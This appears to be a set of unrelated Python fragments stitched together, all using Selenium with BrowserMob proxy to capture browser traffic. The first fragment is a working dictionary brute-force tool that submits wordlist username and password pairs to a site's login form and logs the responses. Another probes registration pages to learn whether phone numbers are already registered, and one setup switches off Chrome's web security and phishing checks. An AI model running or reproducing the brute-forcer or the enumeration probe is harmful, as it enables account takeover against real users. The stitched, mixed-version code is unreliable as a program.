                            help="Js encryption is required url")
        parser.add_argument("-cu", "--class-user", metavar='class_user',
                            required=True,
                            help="The class name of the Username tag.")
        parser.add_argument("-cp", "--class-passwd", metavar='class_passwd',
                            required=True,
                            help="The class name of the Password tag.")
        parser.add_argument("-l", "--class-login", metavar='class_login',
                            required=True,
                            help="The class name of the Password tag.")
        parser.add_argument("-ud", "--Username-dict", metavar='Username_dict',
                            help="Username dict file")
        parser.add_argument("-pd", "--Password-dict", metavar='Password_dict',
                            required=True, help="Password dict file")
        parser.add_argument("-user", "--username", metavar='username',
                            help="username")
        parser.add_argument("-f", "--out-file", metavar='out_file',
                            help="out - file name")
        parser.add_argument("-p", "--port", metavar="port",
                            help="designated port")
        return parser.parse_args()

    def init_dict_list(self):
        # Iterate the credential dictionaries and submit the login form
        # once per (username, password) combination, then collect results.
        print(
            "------------------------------------开始扫描!--------------------------------------\n"
        )
        if self.args.Username_dict != None:
            # Username dictionary supplied: full cross-product scan.
            with open(self.args.Username_dict, "r") as f_u:
                self.username_list = f_u.readlines()
                for username in self.username_list:
                    with open(self.args.Password_dict, "r") as f:
                        self.password_list = f.readlines()
                        for password in self.password_list:
                            self.fill_out_a_form(username.replace('\n', ''),
                                                 password.replace('\n', ''))
        else:
            # Single username (-user) against the password dictionary.
            with open(self.args.Password_dict, "r") as f:
                self.password_list = f.readlines()
                for password in self.password_list:
                    self.fill_out_a_form(self.args.username,
                                         password.replace('\n', ''))
        self.wget_response()

    def init_browsermobproxy(self):
        # Start the BrowserMob server and prepare Chrome options that route
        # traffic through its proxy, headless.
        try:
            self.server = Server(
                "browsermob-proxy-2.1.4\\bin\\browsermob-proxy.bat")
        except Exception as e:
            print("browsermob-proxy 服务启动失败!请查看输入路径是否正确,或者端口是否被占用!\n")
            return 0
        self.server.start()
        self.proxy = self.server.create_proxy()
        self.chrome_options = Options()
        self.chrome_options.add_argument('--proxy-server={0}'.format(
            self.proxy.proxy))
        self.chrome_options.add_argument('--headless')

    def init_chrome(self):
        # Launch proxied Chrome, start HAR capture (with bodies), and open
        # the target login page.
        try:
            self.chrome = webdriver.Chrome(chrome_options=self.chrome_options,
                                           executable_path='chromedriver.exe')
            self.proxy.new_har("ht_list2", options={'captureContent': True})
            self.chrome.get(self.args.url)
        except Exception as e:
            print("Chrome浏览器启动失败!请检查是否安装了chrome浏览器\n")
            return 0

    def fill_out_a_form(self, username, password):
        # Locate the inputs by class name, type the credentials, and submit
        # by sending RETURN to the login element.
        try:
            self.chrome.find_element_by_css_selector("[class='{0}']".format(
                self.args.class_user)).clear()
            self.chrome.find_element_by_css_selector("[class='{0}']".format(
                str(self.args.class_user))).send_keys(username)
            self.chrome.find_element_by_css_selector("[class='{0}']".format(
                self.args.class_passwd)).clear()
            self.chrome.find_element_by_css_selector("[class='{0}']".format(
                str(self.args.class_passwd))).send_keys(password)
            self.chrome.find_element_by_css_selector("[class='{0}']".format(
                self.args.class_login)).send_keys(Keys.RETURN)
        except Exception as e:
            print("Please check that the className entered is correct!\n")
            return 0

    def wget_response(self):
        # Walk the captured HAR; any request whose URL carries both
        # "password" and "username" is treated as a login attempt, and its
        # response body is recorded. Results are zipped back onto the
        # password list in submission order.
        result = self.proxy.har
        for entry in result['log']['entries']:
            _url = entry['request']['url']
            print(_url)
            if "password" in _url and "username" in _url:
                _response = entry['response']
                _content = _response['content']
                # Grab the response body returned by the login endpoint.
                self.response_result.append(_response['content']['text'])
        self.result = dict(zip(self.password_list, self.response_result))

    def result_handing(self):
        # Report every attempt: to -f out_file when given, else to stdout.
        if self.args.Username_dict != None:
            for username in self.username_list:
                for key, value in self.result.items():
                    if self.args.out_file != None:
                        with open(self.args.out_file, "a",
                                  encoding="utf-8") as f:
                            f.writelines(
                                "账号:{user}密码:{key} :结果:{result}".format(
                                    user=username, key=key, result=value))
                    else:
                        print("账号:{user}密码:{key} :结果:{result}".format(
                            user=username, key=key, result=value))
        else:
            for key, value in self.result.items():
                if self.args.out_file != None:
                    with open(self.args.out_file, "a",
                              encoding="utf-8") as f:
                        f.writelines("账号:{user}密码:{key} :结果:{result}".format(
                            user=self.args.username, key=key, result=value))
                else:
                    print("账号:{user}密码:{key} :结果:{result}".format(
                        user=self.args.username, key=key, result=value))

    def end_env(self):
        # Tear down: stop the proxy server and Chrome, then force-kill
        # whatever still listens on the proxy port (default 8080) via
        # netstat/taskkill — Windows-specific cleanup.
        try:
            self.server.stop()
            self.chrome.quit()
            if self.args.port == None:
                self.args.port = 8080
            print(self.args.port)
            find_netstat = os.popen(
                "netstat -ano | findstr {port}".format(port=self.args.port))
            pid = find_netstat.read().split()[4]
            kail_pid = os.popen("taskkill /F /PID {PID}".format(PID=pid))
            print(kail_pid.read())
            return 1
        except IndexError as e:
            # netstat found nothing on the port: nothing left to kill.
            return 0
class Monitor(object):
    """
    step 3: configure the chromedriver and browsermobproxy paths.
    Full paths are required, otherwise browsermobproxy cannot start its
    service. Both live in the same directory as monitor.py here. Chrome is
    also set to block images; adjust if you need to capture them.
    """
    PROXY_PATH = path.abspath(
        "F:/rudder/py/accountApi/utils/browsermob-proxy-2.1.1/bin/browsermob-proxy.bat"
    )
    CHROME_PATH = path.abspath("F:/rudder/py/accountApi/utils/chromedriver")
    # Chrome content pref: 2 = block images.
    CHROME_OPTIONS = {"profile.managed_default_content_settings.images": 2}
    # When True, registration checks look up a DOM element instead of text.
    canFoundInText = False

    def __init__(self):
        """
        The class initializer does nothing for now.
        """
        pass

    def initProxy(self):
        """
        step 4: initialize browsermobproxy.
        Configure the network requests to block — CSS and images here
        (Chrome's own setting sometimes fails) — to speed up page loads,
        and create the new proxy address.
        """
        self.server = Server(self.PROXY_PATH)
        self.server.start()
        self.proxy = self.server.create_proxy()
        # Answer blacklisted requests with a 200 instead of fetching them.
        self.proxy.blacklist([
            "http://.*/.*.css.*", "http://.*/.*.jpg.*", "http://.*/.*.png.*",
            "http://.*/.*.gif.*"
        ], 200)

    def initChrome(self):
        """
        step 5: initialize selenium / Chrome settings.
        Point Chrome's proxy at the address browsermobproxy just created.
        """
        chromeSettings = webdriver.ChromeOptions()
        chromeSettings.add_argument('--proxy-server={host}:{port}'.format(
            host="localhost", port=self.proxy.port))
        chromeSettings.add_experimental_option("prefs", self.CHROME_OPTIONS)
        self.driver = webdriver.Chrome(executable_path=self.CHROME_PATH,
                                       chrome_options=chromeSettings)

    # NOTE(review): mutable default argument below is shared across calls;
    # harmless here because it is never mutated, but worth confirming.
    def genNewRecord(self, name="monitor", options={'captureContent': True}):
        """
        step 6: start a new monitoring record, with content capture on.
        """
        self.proxy.new_har(name, options=options)

    def getContentText(self, targetUrl):
        """
        step 7: simple helper to fetch the target data.
        *targetUrl* is the URL (as a regular expression) the browser calls
        for the data of interest.
        """
        if self.proxy.har['log']['entries']:
            for loop_record in self.proxy.har['log']['entries']:
                try:
                    print(loop_record)
                    # if re.fullmatch(targetUrl , loop_record["request"]['url']):
                    #     return loop_record["response"]['content']["text"]
                except Exception as err:
                    print(err)
                    continue
        return None

    def Start(self):
        """step 8: start-up order of the monitor."""
        try:
            self.initProxy()
            self.initChrome()
        except Exception as err:
            print(err)

    def Quit(self):
        """
        step 9: shutdown order of the monitor.
        Stopping the proxy server may fail; currently it is closed by hand.
        If anyone has a proper fix, contributions are very welcome.
        """
        self.driver.close()
        self.driver.quit()
        try:
            self.proxy.close()
            self.server.process.terminate()
            self.server.process.wait()
            self.server.process.kill()
        except OSError:
            pass

    def getPageContent(self):
        # Placeholder/debug hook.
        print(666)

    # Probe whether the phone-number-exists API is reachable.
    # Returns -1 when no username/phone input is found, -2 when filling it
    # triggers no HTTP request, -3 when no request packet is found for the
    # test data, -4 when a "registered" packet cannot be captured.
    def getPhoneApi(self):
        if self.server == None:
            return False
        # self.driver.get('http://www.cndns.com/members/register.aspx')
        element = zfuncs.z_get_input_element_by_key_phone(
            self.driver)  # locate the phone-number input box
        if element == False:
            print "未查找到手机号码输入框"
            return -1
        req_url = self.get_phone_api_url(element)  # request URL, used to locate the packet
        # print req_url
        if req_url == False:
            element = zfuncs.z_get_input_element_by_key_submit(
                self.driver)  # submit button
            req_url = self.get_click(element)  # request URL, used to locate the packet
            if req_url == False:
                print "未发现请求包"
                #return -2
        # print(entry['request']['url'].find(req_url))
        # Try common usernames and capture the "already registered" response:
        # for line in open("./keys/phone.value"):
        #     line = line.strip('\n')
        #     entry = self.find_entry_by_string(element, line)
        #     if entry!=False and entry['request']['url'].find(req_url)!=-1:  # confirm the request packet
        # Decide whether this is an "already registered" packet.
        line = "1300000"
        if self.canFoundInText == False:
            is_exist = zfuncs.z_get_isexists_by_key_exists(self.driver)
        else:
            is_exist = zfuncs.z_get_element_by_key_exists(self.driver)
        if is_exist != False:
            print line + ":发现已注册"
            # return entry  # return the current request packet
        else:
            print line + ":未发现已注册"
        # else:
        #     print line+":未发现请求包"
        #     return -3
        # return -4

    # Fetch the request URL of the phone-number-exists API.
    def get_phone_api_url(self, element):
        if self.server == None:
            return False
        # NOTE(review): "str" shadows the builtin; kept as-is.
        str = '1300' + self.id_generator(7, '0123456789')  # generate a test phone number
        str = '13000000000'  ########################### guding
        entry = self.find_entry_by_string(element, str)
        if entry == False:
            print("输入后未发起请求")
            return False
        url = entry['request']['url']
        # Drop the query string; only the endpoint path matters.
        return url.split("?")[0]

    # Locate the request packet; *element* is the input box to fill.
    def find_entry_by_string(self, element, keystr):
        # All network requests made after typing the content.
        entries = self.get_entries(element, keystr)
        # pdb.set_trace()
        # print("請求後返回"+dir(entries))
        # Check whether any request contains the key string.
        entry = self.find_har_by_string(entries, keystr)
        if entry == False:
            print "未发起网络请求"
            return False
        print "发现填写后会发起网络请求"
        return entry

    # All network requests made after typing into the input box.
    def get_entries(self, element, keystr):
        if element == False:  # no username input found on this page
            return False
        if element.get_attribute('name') != '':
            print "Input name: " + element.get_attribute('name')
        if element.get_attribute('id') != '':
            print "Input id: " + element.get_attribute('id')
        print "填写测试字符串:" + keystr
        # Select-all then type, and TAB away to trigger the blur handler.
        element.send_keys(Keys.CONTROL + "a")
        element.send_keys(keystr)
        element.send_keys(Keys.TAB)
        time.sleep(2)  # wait for the request to finish / page to change
        # print("请求地址"+self.proxy.har['log']['entries'])
        return self.proxy.har['log']['entries']

    # Find the array item containing the key string.
    def find_har_by_string(self, arr, keystr):
        if type(arr) != list:
            print("feilist")
            return False
        # Walk the array backwards looking for the key string.
        for i in range(0, arr.__len__())[::-1]:
            # print arr[i]
            if json.dumps(arr[i]).find(keystr) != -1:
                return arr[i]
        return False

    # Random value generator.
    def id_generator(self, size=6,
                     chars=string.ascii_lowercase + string.digits):
        return ''.join(random.choice(chars) for _ in range(size))

    # Fire a click event and return the requests it produced.
    def get_click(self, element):
        if element == False:
            return False
        element.click()
        print("触发点击事件")
        time.sleep(2)  # wait for the request to finish / page to change
        # print("请求地址"+self.proxy.har['log']['entries'])
        return self.proxy.har['log']['entries']
def getCookies():
    """Open the Taobao login page through a BrowserMob proxy, leave time
    for a manual login (the slider captcha defeats automation), then return
    the session cookies as a {name: value} dict.

    Exits the process when no cookies could be collected.
    """
    # BUG FIX: the original printed sys.path[0] + '\browsermobproxy.bat',
    # where '\b' is a backspace escape, so the printed path was mangled.
    print(sys.path[0] + '\\browsermob-proxy')
    server = Server(sys.path[0] + '\\browsermob-proxy')
    server.start()
    proxy = server.create_proxy()

    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_argument("--proxy-server={0}".format(proxy.proxy))
    driver = webdriver.Chrome(chrome_options=chrome_options)

    proxy.new_har("taobao")
    time.sleep(3)
    driver.get('https://login.taobao.com/member/login.jhtml')
    time.sleep(3)

    # Wait for the user to complete the login (slider captcha etc.) by hand.
    # Mouse-simulation via ActionChains proved unreliable here, so the
    # automated slider code was dropped in favor of a manual login window.
    time.sleep(20)

    cookies = {}
    for elem in driver.get_cookies():
        cookies[elem['name']] = elem['value']
    if len(cookies) > 0:
        print("get Cookies Successful!!!")
    else:
        print("登陆失败")
        sys.exit()
    driver.close()
    driver.quit()
    return cookies
class ApiCrawler(object):
    """Crawl pages through a BrowserMob-proxied Chrome and export matching
    API calls (URL, method, status, redirect, params) from the HAR to CSV.
    """

    def __init__(self, target, supported_methods=('GET', 'POST')):
        self.target = list(target)                  # URL substrings a request must contain
        self.supported_methods = supported_methods  # HTTP methods to keep
        self.browser_mob = 'C:/browsermob-proxy-2.1.4/bin/browsermob-proxy'  # Path to browsermob
        self.server = None
        self.current_har = None

    def __start_server(self):
        # Launch the BrowserMob java process and allocate one proxy port.
        self.server = Server(self.browser_mob)
        self.server.start()
        self.proxy = self.server.create_proxy()

    def __start_driver(self):
        # Chrome routed through the freshly created proxy.
        chrome_options = webdriver.ChromeOptions()
        chrome_options.add_argument("--proxy-server={}".format(
            self.proxy.proxy))
        self.driver = webdriver.Chrome(chrome_options=chrome_options)

    def __start_all(self):
        self.__start_server()
        self.__start_driver()

    def __create_har_no_interaction(self, title, url):
        """Record a HAR for a plain page load (no clicks or scrolling)."""
        self.proxy.new_har(title)
        self.driver.get(url)
        self.current_har = self.proxy.har
        return self.proxy.har

    def __parse_har(self):
        """Return [[url, method, status, redirect_url, *params], ...] for
        captured requests passing the method and target-substring filters.
        Rows without parsed params are dropped."""
        response = []
        temp = self.current_har['log']['entries']
        for i in temp:
            if i['request']['method'] in self.supported_methods:
                if any(target in i['request']['url']
                       for target in self.target):
                    url = i['request']['url']
                    method = i['request']['method']
                    params = parse_results(url)  # helper defined elsewhere
                    status = i['response']['status']
                    redirect_url = i['response']['redirectURL']
                    if params:
                        result_row = [url, method, status,
                                      redirect_url] + params
                        response.append(result_row)
        return response

    def __write_to_csv(self, url, results):
        """Append rows to <netloc>-<today>.csv, prefixing each with netloc.

        NOTE(review): on py3/Windows, open(..., newline='') would avoid
        csv's doubled line endings — left unchanged to preserve behavior.
        """
        parsed = urlparse(url)
        with open('{}-{}.csv'.format(parsed.netloc, date.today()),
                  'a') as file:
            writer = csv.writer(file, dialect='excel')
            for item in results:
                item = [parsed.netloc] + item
                writer.writerow(item)

    def __stop_all(self):
        self.server.stop()
        self.driver.quit()

    def single_page(self, url):
        """Capture, parse and export a single URL."""
        self.__start_all()
        self.__create_har_no_interaction('N/A', url)
        results = self.__parse_har()
        self.__write_to_csv(url, results)
        self.__stop_all()

    def list_of_pages(self, url_list):
        """Capture, parse and export each URL; a failing page is skipped
        rather than aborting the whole run."""
        self.__start_all()
        for url in url_list:
            try:
                self.__create_har_no_interaction('N/A', url)
                results = self.__parse_har()
                self.__write_to_csv(url, results)
            # BUG FIX: the original bare "except:" also swallowed
            # SystemExit and KeyboardInterrupt, making the crawl
            # un-interruptible; catch only ordinary errors.
            except Exception:
                continue
        self.__stop_all()
class ProxyManager(): __BMP = "/Users/hari.ramachandran/PycharmProjects/raw/utils/bin/browsermob-proxy.bat" STOP = False def __init__(self): self.__server = Server(ProxyManager.__BMP) self.__client = None self._thread = None self.stop = False self.har_file_name = None def start_server(self): self.__server.start() return self.__server def start_client(self): self.__client = self.__server.create_proxy( params={"trustAllServers": "true"}) return self.__client @property def client(self): return self.__client @property def server(self): return self.__client def sniff_api(self, host=None, port=9440): server = self.start_server() client = self.start_client() client.new_har("https://{}:{}".format(host, port), options={ "captureHeaders": "true", "captureContent": "true" }) options = webdriver.ChromeOptions() options.add_argument("--proxy-server={}".format(client.proxy)) driver = webdriver.Chrome(chrome_options=options) driver.get("https://{}:{}".format(host, port)) while self.stop == False: time.sleep(1) self.har_file_name = "raw_har_{}".format(int(time.time())) har_data = json.dumps(client.har, indent=4) har_file = open("{}.har".format(self.har_file_name), 'w') # print type(client.har) # print client.har har_file.write(har_data) har_file.close() server.stop() driver.quit() # valid_apis = self.get_valid_api() def stop_sniffing(self): self.stop = True def get_valid_api(self): filterer = ApiFilter(har_file="{}.har".format(self.har_file_name), mouse_listener=None) return filterer.api_filter() def segregate_api(self, valid_apis): pass
from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import Select from selenium.webdriver.support.ui import WebDriverWait from selenium.common.exceptions import NoSuchElementException, ElementNotVisibleException from browsermobproxy import Server import urllib.parse server = Server( r"C:\Users\Administrator\Desktop\browsermob-proxy-2.1.0-beta-6\bin\browsermob-proxy.bat" ) server.start() proxy = server.create_proxy() proxy.new_har() chrome_options = webdriver.ChromeOptions() url = urllib.parse.urlparse(proxy.proxy).path chrome_options.add_argument('--proxy-server=%s' % url) driver = webdriver.Chrome(executable_path=r"c:\chromedriver.exe", chrome_options=chrome_options) driver.get("http://v.pptv.com/show/61uPDHTaSojradE.html") print(proxy.har) driver.quit() server.stop()
class Fetcher: def __init__(self): self.server = None self.proxy = None self.browser = None self.driver = None def set_remote_server(self, host, port): """Defines an already running proxy server for gathering includes and content """ self.server = RemoteServer(host, port) self.proxy = self.server.create_proxy() def start_local_server(self, binpath=None): """Starts a local instance of BrowserMob. Keyword Arguments: binpath -- The full path, including the binary name to the browsermob-proxy binary. """ if binpath is None: binpath = "{0}/browsermob-proxy-2.1.0-beta-4/bin/browsermob-proxy".format( getcwd()) self.server = Server(binpath) self.server.start() self.proxy = self.server.create_proxy() def set_firefox(self): """Sets the Webdriver for Firefox""" self.profile = webdriver.FirefoxProfile() self.profile.set_proxy(self.proxy.selenium_proxy()) self.driver = webdriver.Firefox(firefox_profile=self.profile) def run(self, site, name='fetch'): """Runs an instance of the Fetcher. Requires that either set_remote_server() or start_local_server() has been previously called. Keyword Arguments: site -- The URL of the site to load. name -- Name of the resulting HAR. """ try: self.proxy.headers( {'Via': None} ) # TODO: Need to override BrowserMob to remove the Via Header - https://github.com/lightbody/browsermob-proxy/issues/213 self.proxy.new_har(name, options={ 'captureHeaders': True, 'captureContent': True, 'captureBinaryContent': True }) self.driver.get(site) har = self.proxy.har har['dom'] = self.driver.page_source return har except AttributeError: print "[!] FAILED: Ensure you have set a Webdriver" def close(self): try: self.proxy.stop( ) # The proxy won't need to be stopped if using remote_server() except AttributeError: pass try: self.driver.close() except AttributeError: print '[!] Driver not found'
class HarProfiler:
    """Capture HAR archives (with page-event timings) for a URL through a
    BrowserMob-proxied Firefox, optionally logging in to edX first.

    Use as a context manager: the proxy server (and virtual display, if
    enabled) are started on __enter__ and stopped on __exit__.
    """

    def __init__(self, config, url, login_first=False):
        self.url = url
        self.login_first = login_first
        self.login_user = config.get('login_user')
        self.login_password = config.get('login_password')
        self.browsermob_dir = config['browsermob_dir']
        self.har_dir = config['har_dir']
        self.label_prefix = config['label_prefix'] or ''
        self.run_cached = config['run_cached']
        self.virtual_display = config['virtual_display']
        self.virtual_display_size_x = config['virtual_display_size_x']
        self.virtual_display_size_y = config['virtual_display_size_y']

        self.label = '{}{}'.format(self.label_prefix, self.slugify(url))
        self.cached_label = '{}-cached'.format(self.label)

        # Same epoch for both names so cold/warm HARs pair up on disk.
        epoch = time.time()
        self.har_name = '{}-{}.har'.format(self.label, epoch)
        self.cached_har_name = '{}-{}.har'.format(self.cached_label, epoch)

    def __enter__(self):
        if self.virtual_display:
            log.info('starting virtual display')
            self.display = Display(visible=0, size=(
                self.virtual_display_size_x,
                self.virtual_display_size_y
            ))
            self.display.start()
        log.info('starting browsermob proxy')
        self.server = Server('{}/bin/browsermob-proxy'.format(
            self.browsermob_dir)
        )
        self.server.start()
        return self

    def __exit__(self, type, value, traceback):
        log.info('stopping browsermob proxy')
        self.server.stop()
        if self.virtual_display:
            log.info('stopping virtual display')
            self.display.stop()

    def _make_proxied_webdriver(self):
        """Return a (driver, proxy) pair wired through a fresh proxy port."""
        proxy = self.server.create_proxy()
        profile = webdriver.FirefoxProfile()
        profile.set_proxy(proxy.selenium_proxy())
        driver = webdriver.Firefox(firefox_profile=profile)
        return (driver, proxy)

    def _save_har(self, har, cached=False):
        """Serialize *har* to har_dir, creating the directory if needed."""
        if not os.path.isdir(self.har_dir):
            os.makedirs(self.har_dir)
        har_name = self.cached_har_name if cached else self.har_name
        log.info('saving HAR file: {}'.format(har_name))
        with open(os.path.join(self.har_dir, har_name), 'w') as f:
            json.dump(har, f, indent=2, ensure_ascii=False)

    def _login(self, driver):
        """Log the driver's session in to courses.edx.org.

        Raises RuntimeError when credentials are missing from the config.
        """
        log.info('logging in...')
        error_msg = 'must specify login credentials in yaml config file'
        if self.login_user is None:
            raise RuntimeError(error_msg)
        if self.login_password is None:
            raise RuntimeError(error_msg)
        driver.get('https://courses.edx.org/login')
        # handle both old and new style logins
        try:
            email_field = driver.find_element_by_id('email')
            password_field = driver.find_element_by_id('password')
        except NoSuchElementException:
            email_field = driver.find_element_by_id('login-email')
            password_field = driver.find_element_by_id('login-password')
        email_field.send_keys(self.login_user)
        password_field.send_keys(self.login_password)
        password_field.submit()

    def _add_page_event_timings(self, driver, har):
        """Copy the browser's Navigation Timing numbers into the HAR's
        pageTimings (onContentLoad / onLoad, ms relative to navigation)."""
        jscript = textwrap.dedent("""
            var performance = window.performance || {};
            var timings = performance.timing || {};
            return timings;
            """)
        timings = driver.execute_script(jscript)
        har['log']['pages'][0]['pageTimings']['onContentLoad'] = (
            timings['domContentLoadedEventEnd'] - timings['navigationStart']
        )
        har['log']['pages'][0]['pageTimings']['onLoad'] = (
            timings['loadEventEnd'] - timings['navigationStart']
        )
        return har

    def load_page(self):
        """Load self.url (cold, then optionally warm) and save one HAR with
        timings per load."""
        # BUG FIX: pre-bind driver so the cleanup cannot raise NameError
        # (masking the real exception) when _make_proxied_webdriver fails.
        driver = None
        try:
            driver, proxy = self._make_proxied_webdriver()
            if self.login_first:
                self._login(driver)
            proxy.new_har(self.label)
            log.info('loading page: {}'.format(self.url))
            driver.get(self.url)
            har = self._add_page_event_timings(driver, proxy.har)
            self._save_har(har)
            if self.run_cached:
                proxy.new_har(self.cached_label)
                log.info('loading cached page: {}'.format(self.url))
                driver.get(self.url)
                har = self._add_page_event_timings(driver, proxy.har)
                self._save_har(har, cached=True)
        finally:
            # (the original's "except Exception: raise" was a no-op)
            if driver is not None:
                driver.quit()

    def slugify(self, text):
        """Lower-case *text* and join its alphanumeric runs with hyphens."""
        pattern = re.compile(r'[^a-z0-9]+')
        slug = '-'.join(word for word in pattern.split(text.lower()) if word)
        return slug
######################################################################################################################## app = Flask(__name__) # Set up BrowserMob proxy for proc in psutil.process_iter(): # Kill BrowserMob if it happens to already be running if proc.name() == 'browsermob-proxy': proc.kill() browsermob_options = {'port': 8090} browsermob_server = Server(path=BROWSERMOB_PROXY_PATH, options=browsermob_options) browsermob_server.start() time.sleep(1) proxy = browsermob_server.create_proxy() time.sleep(1) # Set up the Selenium driver for headless Chrome chrome_options = webdriver.ChromeOptions() chrome_options.add_argument('headless') chrome_options.add_argument('proxy-server={0}'.format(proxy.proxy)) # Start: "Pen testing" options chrome_options.add_argument('disable-web-security') chrome_options.add_argument('allow-running-insecure-content') chrome_options.add_argument('disable-client-side-phishing-detection') chrome_options.add_argument('disable-extensions') chrome_options.add_argument('disable-offer-store-unmasked-wallet-cards') chrome_options.add_argument('disable-offer-upload-credit-cards') chrome_options.add_argument('disable-popup-blocking') chrome_options.add_argument('disable-signin-promo')
def run_webdriver(self, start_url, port, config, download_dir):
    """Run Selenium WebDriver through a BrowserMob proxy and capture a HAR.

    Starts a BrowserMob proxy on ``port``, builds a Firefox profile that
    silently saves downloads into ``download_dir`` and routes all traffic
    through the proxy, then loads ``start_url`` under Xvfb while recording
    headers, text and binary bodies into a HAR.

    :param start_url: parsed URL object (``.hostname`` names the HAR capture)
    :param port: TCP port for the BrowserMob proxy to listen on
    :param config: run options; the ``url``, ``referer``, ``useragent`` and
                   ``firefoxprofile`` attributes are read
    :param download_dir: directory Firefox auto-saves downloads into
    """
    webdriver = None
    har = None
    urllib3_logger = logging.getLogger('urllib3')
    urllib3_logger.setLevel(logging.DEBUG)
    self.logger.info("Starting WebRunner")

    # Fall back to a Google-search referer and a stock Firefox user agent
    # when the config does not force specific values.
    if config.referer:
        referer = config.referer
    else:
        referer = 'http://www.google.com/search?q={}+&oq={}&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&channel=fflb&gws_rd=cr'.format(
            config.url, config.url)
    if config.useragent:
        useragent = config.useragent
    else:
        useragent = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:24.0) Gecko/20100101 Firefox/24.0'

    self.logger.debug("Running with UserAgent: {}".format(useragent))
    self.logger.debug("Running with Referer: {}".format(referer))
    self.logger.debug("Checking URL: {}".format(config.url))

    server = Server("lib/browsermob/bin/browsermob-proxy", {'port': port})
    server.start()
    proxy = server.create_proxy()
    proxy.headers({'User-Agent': useragent,
                   'Accept-Encoding': "",
                   'Connection': 'Close'})
    # BrowserMob-side interceptor: add the fake Referer header only to
    # requests that do not already carry one.
    request_js = (
        'var referer = request.getProxyRequest().getField("Referer");'
        'addReferer(request);'
        'function addReferer(r){'
        'if (! referer ) {'
        'r.addRequestHeader("Referer","' + referer + '");'
        '}'
        'return;'
        '}')
    proxy.request_interceptor(request_js)
    # BUGFIX: dropped the original's unused `from types import NoneType`
    # (dead code, and NoneType is not importable on Python 3).

    if config.firefoxprofile is not None and os.path.isdir(config.firefoxprofile):
        self.logger.debug("Using existing firefox profile")
        firefox_profile = FirefoxProfile(profile_directory=config.firefoxprofile)
    else:
        firefox_profile = FirefoxProfile()
    self.logger.debug("Using profile {}".format(firefox_profile.path))
    # Silence OCSP lookups and auto-save downloads without prompting.
    firefox_profile.set_preference("security.OCSP.enabled", 0)
    firefox_profile.set_preference("browser.download.folderList", 2)
    firefox_profile.set_preference("browser.download.manager.showWhenStarting", False)
    firefox_profile.set_preference("browser.download.dir", download_dir)
    firefox_profile.set_preference("browser.helperApps.neverAsk.saveToDisk", "application/x-xpinstall;application/x-zip;application/x-zip-compressed;application/octet-stream;application/zip;application/pdf;application/msword;text/plain;application/octet")
    firefox_profile.set_preference("browser.helperApps.alwaysAsk.force", False)
    # Allow mixed content so the interception proxy does not break pages.
    firefox_profile.set_preference("security.mixed_content.block_active_content", False)
    firefox_profile.set_preference("security.mixed_content.block_display_content", False)
    firefox_profile.set_preference("extensions.blocklist.enabled", False)
    firefox_profile.set_preference("network.proxy.type", 1)
    firefox_profile.set_proxy(proxy.selenium_proxy())
    firefox_profile.set_preference("webdriver.log.file", "/tmp/ff.log")
    firefox_profile.set_preference("webdriver.log.driver", "DEBUG")
    # Disable new-tab-page phone-home traffic so it does not pollute the HAR.
    firefox_profile.set_preference("browser.newtabpage.enhanced", False)
    firefox_profile.set_preference("browser.newtabpage.enabled", False)
    firefox_profile.set_preference("browser.newtabpage.directory.ping", "")
    firefox_profile.set_preference("browser.newtabpage.directory.source", "")
    firefox_profile.set_preference("browser.search.geoip.url", "")

    try:
        self.xvfb.start()
        capabilities = DesiredCapabilities.FIREFOX
        capabilities['loggingPrefs'] = {'browser': 'ALL'}
        # Prefer a firefox binary bundled inside the profile, if present.
        if os.path.exists("{}/firefox".format(firefox_profile.path)):
            binary = FirefoxBinary("{}/firefox".format(firefox_profile.path))
        else:
            binary = FirefoxBinary("/usr/bin/firefox")
        webdriver = WebDriver(capabilities=capabilities,
                              firefox_profile=firefox_profile,
                              firefox_binary=binary)
        proxy.new_har(start_url.hostname,
                      options={"captureHeaders": "true",
                               "captureContent": "true",
                               "captureBinaryContent": "true"})
        self.analyse_page(webdriver, start_url)
        for entry in webdriver.get_log('browser'):
            self.logger.info("Firefox: {}".format(entry))
        # NOTE(review): the wrapped Har is never returned or stored, matching
        # the original — confirm whether analyse_page records it elsewhere.
        har = Har(proxy.har)
        self.logger.info("Stopping WebRunner")
    except Exception as e:  # BUGFIX: Python-2-only `except Exception, e` syntax
        # Best-effort run: log the failure and fall through to cleanup,
        # matching the original's swallow-and-continue behavior.
        self.logger.error(e)
    finally:
        # BUGFIX: the original leaked the Xvfb display on the success path
        # (xvfb.stop() only ran in the except branch) and duplicated the
        # teardown in both branches; centralize all cleanup here.
        proxy.close()
        if webdriver:
            webdriver.quit()
        self.xvfb.stop()
        server.stop()
class ProxyManager:
    """Manage a BrowserMob proxy server/client pair for HTTP capture.

    Locates the bundled browsermob-proxy launcher for the current OS,
    starts/stops the proxy server on port 9090, hands out proxy clients
    configured to trust all server certificates, and resolves the path of
    the Selenium driver for an installed browser via DetectManager.
    """

    __PARENT_DIR = dirname(dirname(abspath(__file__)))
    __OS_NAME = platform.system()
    __DRIVER_PATH = ''

    # Browser identifiers accepted by selectBrowser / DetectManager.
    GOOGLE_CHROME = "google-chrome"
    CHROME = "chrome"
    CHROMIUM = "chromium"
    CHROMIUM_BROWSER = "chromium-browser"
    MOZILLA = "mozilla"
    FIREFOX = "firefox"

    detectManager = DetectManager()

    def __init__(self):
        self.detectManager.createDriver()
        if ProxyManager.__OS_NAME == 'Linux' or ProxyManager.__OS_NAME == 'Darwin':
            self.__BMP = self.__PARENT_DIR + "/browsermob-proxy-2.1.4/bin/browsermob-proxy"
            self.__DRIVER_PATH = self.__PARENT_DIR + "/drivers/" + self.__getDriverName(
                '')
        elif ProxyManager.__OS_NAME == 'Windows':
            # BUGFIX: the original used "\b..." in a normal string literal;
            # Python interprets \b as a backspace escape (\x08), silently
            # corrupting the path. A raw string keeps the backslashes.
            # NOTE(review): __DRIVER_PATH is left '' on Windows until
            # selectBrowser() is called — confirm whether that is intended.
            self.__BMP = self.__PARENT_DIR + r"\browsermob-proxy-2.1.4\bin\browsermob-proxy.bat"
        self.__server = Server(self.__BMP, {'port': 9090})
        self.__client = None

    def start_server(self):
        """Start the BrowserMob proxy server process and return it."""
        self.__server.start()
        return self.__server

    def start_client(self):
        """Create (and return) a proxy client that trusts all server certs."""
        self.__client = self.__server.create_proxy(
            params={"trustAllServer": "true"})
        return self.__client

    @property
    def client(self):
        return self.__client

